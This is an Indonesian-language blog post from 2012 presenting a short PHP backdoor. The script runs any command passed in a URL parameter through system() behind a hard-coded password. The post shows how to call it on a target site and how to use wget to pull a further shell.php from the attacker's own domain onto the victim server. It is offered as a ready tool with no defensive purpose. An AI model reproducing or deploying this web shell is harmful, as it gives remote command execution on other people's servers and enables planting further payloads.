Shell Cmd dengan Password - Code Nubitol
Headlines News :
Home » » Shell Cmd dengan Password

Shell Cmd dengan Password

Written By Singai on Senin, 15 Oktober 2012 | 11.23

Buka notepad dan paste code di bawah ini:
<?php
$password = "password";
if($_GET['cmd'] && $_GET['pwd']) {
   if($_GET['pwd'] != $password) die();   
   echo system($_GET['cmd']);
   die();
}

simpan dengan nama backdoor.php
lalu buka URL-nya
http://target.com/backdoor.php?pwd=password&cmd=command

Tuh kan kelihatan semua isi directory nya dengan command : dir
kalau mau upload shell tinggal:
http://target.com/backdoor.php?pwd=password&cmd=wget http://domainkamu.com/shell.php

dagh dulu yah...

semoga bermanfaat

salam
Share this article :

0 komentar:

Speak up your mind

Tell us what you're thinking... !

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Code Nubitol - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger